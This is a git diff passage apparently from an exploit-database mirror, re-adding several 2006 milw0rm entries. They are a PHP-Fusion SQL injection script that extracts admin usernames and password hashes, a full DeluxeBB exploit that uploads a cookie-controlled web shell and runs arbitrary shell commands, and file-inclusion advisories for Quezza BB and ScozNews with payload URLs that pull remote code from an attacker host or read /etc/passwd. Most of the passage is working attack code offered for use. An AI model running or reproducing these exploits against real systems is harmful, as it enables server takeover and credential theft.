-echo "hash:  ".$hash."\r\n";
-?>
-
-# milw0rm.com [2006-05-16]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "PHP-Fusion <= v6.00.306 \"srch_where\" SQL Injection/Admin credentials disclosure\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+
+if ($argc<5) {
+echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to PHP-Fusion\r\n";
+echo "user/pass: you need an account\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Example:\r\n";
+echo "php ".$argv[0]." localhost /fusion/ username password\r\n";
+die;
+}
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$user=$argv[3];
+$pass=$argv[4];
+$port=80;
+$proxy="";
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "step 1 -> login...\r\n";
+$data ="user_name=".urlencode(trim($user));
+$data.="&user_pass=".urlencode(trim($pass));
+$data.="&login=Login";
+$packet="POST ".$p."news.php HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
+$packet.="Referer: http://".$host.$path."news.php\r\n";
+$packet.="Accept-Language: en\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Keep-Alive\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$temp2=explode(' ',$temp[1]);
+$cookie=$temp2[0];
+echo 'Your cookie -> '.$cookie."\r\n\r\n";
+if ($cookie=='') {die("Unable to login...");}
+
+echo "step 2 -> inject some code in srch_where argument...\r\n";
+$sql="999999 UNION SELECT 0,0,0,user_name,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*";
+$sql=urlencode($sql);
+$packet ="GET ".$p."messages.php?folder=inbox&show=_&srch_where=".$sql." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("messages.php?msg_view=",$html);
+$temp2=explode(">",$temp[1]);
+$temp=explode("<",$temp2[1]);
+$admin=$temp[0];
+echo "admin: ".$admin."\r\n";
+
+$sql="999999 UNION SELECT 0,0,0,user_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM fusion_users WHERE user_level=103/*";
+$sql=urlencode($sql);
+$packet ="GET ".$p."messages.php?folder=inbox&show=_&srch_where=".$sql." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("messages.php?msg_view=",$html);
+$temp2=explode(">",$temp[1]);
+$temp=explode("<",$temp2[1]);
+$hash=$temp[0];
+echo "hash:  ".$hash."\r\n";
+?>
+
+# milw0rm.com [2006-05-16]
diff --git a/platforms/php/webapps/1797.php b/platforms/php/webapps/1797.php
index ddd4d33a9..40b0e1b52 100755
--- a/platforms/php/webapps/1797.php
+++ b/platforms/php/webapps/1797.php
@@ -1,317 +1,317 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "DeluxeBB <= v1.06 attachment mod_mime exploit\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n";
-echo "tested & working against a fresh deluxebb installation\r\n\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to deluxebb\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /deluxebb/ cat ./../settings/info.php\r\n";
-echo "php ".$argv[0]." localhost /deluxebb/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n\r\n";
-die;
-}
-
-/*explaination:
-
-  you can upload attachments with double extensions, ex.:
-
-  test.php.php.rar
-
-  file is renamed like this:
-
-  test.php.php-1147772503.ext
-
-  and copied to the files/ folder, as you can see, new filename is predictable...,
-  numbers are the result of time() php function, you have just to synchronize
-  clocks through Apache "Date" header...
-
-  It seems that Apache mod_mime module considers double-extension files like
-  this to be valid PHP files and runs the arbitrary code that has been uploaded,
-  actually on most versions you can do somethign like this:
-
-  http://[target]/[path]/files/test.php.php-1147772503.ext?cmd=ls%20-la
-                                 */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-   $c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-   }
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-function greenwich_timestamp($response)
-{
-   $temp=explode("Date: ",$response);
-   $temp2=explode("\r\n",$temp[1]);
-   $is_now=$temp2[0];
-   $temp=explode(" ",$is_now);$day=$temp[1];$month=$temp[2];$year=$temp[3];$temp2=explode(":",$temp[4]);
-   $hour=$temp2[0];$min=$temp2[1];$sec=$temp2[2];
-   $tb=array ('Jan', '1','Feb', '2','Mar', '3','Apr', '4','May', '5','Jun', '6',
-   'Jul', '7','Aug', '8','Sep', '9','Oct', '10','Nov', '11','Dec', '12');
-   for ($i=0;$i<=23;$i++) {if ($month==$tb[$i]) {$month=$tb[$i+1];break;}}
-   return mktime($hour,$min,$sec,$month,$day,$year);
-}
-
-function gmtime() {    // Get GM offset.
-   return time() - (int) date('Z');
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "step 0 -> Check if suntzu.php is already installed\r\n";
-$packet ="GET ".$p."files/suntzu.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (strstr($html,"56789"))
-{
-    echo "Exploit succeeded...";
-    $temp=explode("56789",$html);
-    die("\r\n".$temp[1]."\r\n");
-}
-
-echo "step 0b -> Synchronize...\r\n";
-$difftime=0;
-//Unin epoch time by Apache "Date:" response header
-//it carries GMT time... sending HEAD request
-$packet ="HEAD / HTTP/1.1\r\nHost: ".$host."\r\nConnection: Close\r\n\r\n";
-sendpacketii($packet);
-if ((eregi("Date: ",$html)) and ($proxy==''))
-{
-$itstime=greenwich_timestamp($html);
-echo "target host Greenwich timestamp: ".$itstime."\r\n";
-$mytime=gmtime();
-echo "my greenwich timestamp: ".$mytime."\r\n";
-$difftime= $itstime-$mytime;
-echo "difftime: ".$difftime."\r\n";
-}
-else
-{
-echo "Unable to read \"Date\", assuming difftime = 0\r\n";
-}
-
-echo "step 1 -> Register...\r\n";
-srand(make_seed());
-$anumber = rand(1,99999);
-$data="name=suntzu".$anumber;
-$data.="&pass=suntzu";
-$data.="&pass2=suntzu";
-$data.="&email=suntzu".$anumber."%40fakemail.com";
-$data.="&hideemail=1";
-$data.="&languagex=English";
-$data.="&xthetimeoffset=2";
-$data.="&xthedateformat=d-m-Y";
-$data.="&xthetimeformat=24";
-$data.="&submit=Register";
-$packet ="POST ".$p."misc.php?sub=register HTTP/1.0\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="User-Agent: Googlebot/2.1\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-$temp=explode("Set-Cookie: ",$html);
-$cookie="";
-for ($i=1; $i<=count($temp)-1; $i++)
-{
-$temp2=explode(" ",$temp[$i]);
-$cookie.=" ".$temp2[0];
-}
-if ($cookie=='') {
-         die("Unable to register...");
-    }
-else {
-         echo "cookie -> ".$cookie."\r\n";
-         }
-
-echo "step 2 -> Post a new thread with the evil attachment...\r\n";
-
-$attachment='
-<?php
-$fp=fopen("suntzu.php","w");
-fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
-fclose($fp);
-chmod("suntzu.php",777);
-?>';
-
-$data='-----------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="subject"
-
-Sun-Tzu, Art of War
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="posticon"
-
-None
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="disablesmilies"
-
-1
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="fileupload"; filename="suntzu'.$anumber.'.php.php.rar"
-Content-Type: application/octet-stream
-
-'.$attachment.'
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="MAX_FILE_SIZE"
-
-1048576
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="what"
-
-ciao
------------------------------7d6ee3a7074a
-Content-Disposition: form-data; name="submit"
-
-Post
------------------------------7d6ee3a7074a--
-';
-
-$packet ="POST ".$p."newpost.php?sub=newthread&fid=1 HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Cookie: ".$cookie."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-$mytime=time() + $difftime;
-sendpacketii($packet);
-sleep(2);
-
-/*
-file is renamed in this way:
-
-...
-$time = time(); //header.php, line 78
-...
-
-...
-$saveit = $settings['attachdir'] . $filename . '-' . $time . '.' . 'ext'; //newpost.php, line 218-219
-copy($fileupload['tmp_name'], $saveit);
-...                                 */
-
-$predict_time=
-            array (
-             $mytime,
-             $mytime + 1,
-             $mytime + 2,
-             $mytime + 3,
-             $mytime + 4,
-             $mytime + 5,
-             $mytime + 6
-             );
-
-for ($i=0; $i<=count($predict_time)-1; $i++)
-{
-  $a=3+$i;
-  echo "step ".$a." -> trying with suntzu".$anumber.".php.php-".$predict_time[$i].".ext\r\n";
-  $packet ="GET ".$p."files/suntzu".$anumber.".php.php-".$predict_time[$i].".ext HTTP/1.0\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  sendpacketii($packet);
-
-  $packet ="GET ".$p."files/suntzu.php HTTP/1.0\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Cookie: cmd=".$cmd.";\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  sendpacketii($packet);
-  if (strstr($html,"56789"))
-  {
-    echo "Exploit succeeded...";
-    $temp=explode("56789",$html);
-    die("\r\n".$temp[1]."\r\n");
-  }
-}
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-05-16]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "DeluxeBB <= v1.06 attachment mod_mime exploit\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n";
+echo "tested & working against a fresh deluxebb installation\r\n\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to deluxebb\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /deluxebb/ cat ./../settings/info.php\r\n";
+echo "php ".$argv[0]." localhost /deluxebb/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n\r\n";
+die;
+}
+
+/*explaination:
+
+  you can upload attachments with double extensions, ex.:
+
+  test.php.php.rar
+
+  file is renamed like this:
+
+  test.php.php-1147772503.ext
+
+  and copied to the files/ folder, as you can see, new filename is predictable...,
+  numbers are the result of time() php function, you have just to synchronize
+  clocks through Apache "Date" header...
+
+  It seems that Apache mod_mime module considers double-extension files like
+  this to be valid PHP files and runs the arbitrary code that has been uploaded,
+  actually on most versions you can do somethign like this:
+
+  http://[target]/[path]/files/test.php.php-1147772503.ext?cmd=ls%20-la
+                                 */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+   $c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+   }
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+function greenwich_timestamp($response)
+{
+   $temp=explode("Date: ",$response);
+   $temp2=explode("\r\n",$temp[1]);
+   $is_now=$temp2[0];
+   $temp=explode(" ",$is_now);$day=$temp[1];$month=$temp[2];$year=$temp[3];$temp2=explode(":",$temp[4]);
+   $hour=$temp2[0];$min=$temp2[1];$sec=$temp2[2];
+   $tb=array ('Jan', '1','Feb', '2','Mar', '3','Apr', '4','May', '5','Jun', '6',
+   'Jul', '7','Aug', '8','Sep', '9','Oct', '10','Nov', '11','Dec', '12');
+   for ($i=0;$i<=23;$i++) {if ($month==$tb[$i]) {$month=$tb[$i+1];break;}}
+   return mktime($hour,$min,$sec,$month,$day,$year);
+}
+
+function gmtime() {    // Get GM offset.
+   return time() - (int) date('Z');
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "step 0 -> Check if suntzu.php is already installed\r\n";
+$packet ="GET ".$p."files/suntzu.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (strstr($html,"56789"))
+{
+    echo "Exploit succeeded...";
+    $temp=explode("56789",$html);
+    die("\r\n".$temp[1]."\r\n");
+}
+
+echo "step 0b -> Synchronize...\r\n";
+$difftime=0;
+//Unin epoch time by Apache "Date:" response header
+//it carries GMT time... sending HEAD request
+$packet ="HEAD / HTTP/1.1\r\nHost: ".$host."\r\nConnection: Close\r\n\r\n";
+sendpacketii($packet);
+if ((eregi("Date: ",$html)) and ($proxy==''))
+{
+$itstime=greenwich_timestamp($html);
+echo "target host Greenwich timestamp: ".$itstime."\r\n";
+$mytime=gmtime();
+echo "my greenwich timestamp: ".$mytime."\r\n";
+$difftime= $itstime-$mytime;
+echo "difftime: ".$difftime."\r\n";
+}
+else
+{
+echo "Unable to read \"Date\", assuming difftime = 0\r\n";
+}
+
+echo "step 1 -> Register...\r\n";
+srand(make_seed());
+$anumber = rand(1,99999);
+$data="name=suntzu".$anumber;
+$data.="&pass=suntzu";
+$data.="&pass2=suntzu";
+$data.="&email=suntzu".$anumber."%40fakemail.com";
+$data.="&hideemail=1";
+$data.="&languagex=English";
+$data.="&xthetimeoffset=2";
+$data.="&xthedateformat=d-m-Y";
+$data.="&xthetimeformat=24";
+$data.="&submit=Register";
+$packet ="POST ".$p."misc.php?sub=register HTTP/1.0\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="User-Agent: Googlebot/2.1\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$cookie="";
+for ($i=1; $i<=count($temp)-1; $i++)
+{
+$temp2=explode(" ",$temp[$i]);
+$cookie.=" ".$temp2[0];
+}
+if ($cookie=='') {
+         die("Unable to register...");
+    }
+else {
+         echo "cookie -> ".$cookie."\r\n";
+         }
+
+echo "step 2 -> Post a new thread with the evil attachment...\r\n";
+
+$attachment='
+<?php
+$fp=fopen("suntzu.php","w");
+fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
+fclose($fp);
+chmod("suntzu.php",777);
+?>';
+
+$data='-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="subject"
+
+Sun-Tzu, Art of War
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="posticon"
+
+None
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="disablesmilies"
+
+1
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="fileupload"; filename="suntzu'.$anumber.'.php.php.rar"
+Content-Type: application/octet-stream
+
+'.$attachment.'
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+1048576
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="what"
+
+ciao
+-----------------------------7d6ee3a7074a
+Content-Disposition: form-data; name="submit"
+
+Post
+-----------------------------7d6ee3a7074a--
+';
+
+$packet ="POST ".$p."newpost.php?sub=newthread&fid=1 HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6ee3a7074a\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Cookie: ".$cookie."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+$mytime=time() + $difftime;
+sendpacketii($packet);
+sleep(2);
+
+/*
+file is renamed in this way:
+
+...
+$time = time(); //header.php, line 78
+...
+
+...
+$saveit = $settings['attachdir'] . $filename . '-' . $time . '.' . 'ext'; //newpost.php, line 218-219
+copy($fileupload['tmp_name'], $saveit);
+...                                 */
+
+$predict_time=
+            array (
+             $mytime,
+             $mytime + 1,
+             $mytime + 2,
+             $mytime + 3,
+             $mytime + 4,
+             $mytime + 5,
+             $mytime + 6
+             );
+
+for ($i=0; $i<=count($predict_time)-1; $i++)
+{
+  $a=3+$i;
+  echo "step ".$a." -> trying with suntzu".$anumber.".php.php-".$predict_time[$i].".ext\r\n";
+  $packet ="GET ".$p."files/suntzu".$anumber.".php.php-".$predict_time[$i].".ext HTTP/1.0\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  sendpacketii($packet);
+
+  $packet ="GET ".$p."files/suntzu.php HTTP/1.0\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Cookie: cmd=".$cmd.";\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  sendpacketii($packet);
+  if (strstr($html,"56789"))
+  {
+    echo "Exploit succeeded...";
+    $temp=explode("56789",$html);
+    die("\r\n".$temp[1]."\r\n");
+  }
+}
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-05-16]
diff --git a/platforms/php/webapps/1798.txt b/platforms/php/webapps/1798.txt
index 89066d9bb..9bb67045b 100755
--- a/platforms/php/webapps/1798.txt
+++ b/platforms/php/webapps/1798.txt
@@ -1,11 +1,11 @@
-Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability.
-Method found by nukedx,
-Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
-This exploit works on Quezza BB <= 1.0
-Original advisory can be found at: http://www.nukedx.com/?viewdoc=30
-http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=http://yourhost.com/cmd.txt?
-http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=/etc/passwd%00
-Succesful exploitation register_globals on for both examples.
-# nukedx.com [2006-04-21]
-
-# milw0rm.com [2006-05-17]
+Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability.
+Method found by nukedx,
+Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
+This exploit works on Quezza BB <= 1.0
+Original advisory can be found at: http://www.nukedx.com/?viewdoc=30
+http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=http://yourhost.com/cmd.txt?
+http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=/etc/passwd%00
+Succesful exploitation register_globals on for both examples.
+# nukedx.com [2006-04-21]
+
+# milw0rm.com [2006-05-17]
diff --git a/platforms/php/webapps/1800.txt b/platforms/php/webapps/1800.txt
index 42b84362e..f70a8f2f3 100755
--- a/platforms/php/webapps/1800.txt
+++ b/platforms/php/webapps/1800.txt
@@ -1,32 +1,32 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#ScozNews v1.2.1 - Remote File Include
-#Find by Kacper (Rahim).
-#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#dork: "(Powered By ScozNews)"
-##################################################################
-
-http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]
-
-
-http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]
-
-
-http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]
-
-http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]
-
-###################################################################
-#Elo ;-)
-
-# milw0rm.com [2006-05-17]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#ScozNews v1.2.1 - Remote File Include
+#Find by Kacper (Rahim).
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#dork: "(Powered By ScozNews)"
+##################################################################
+
+http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]
+
+
+http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]
+
+
+http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]
+
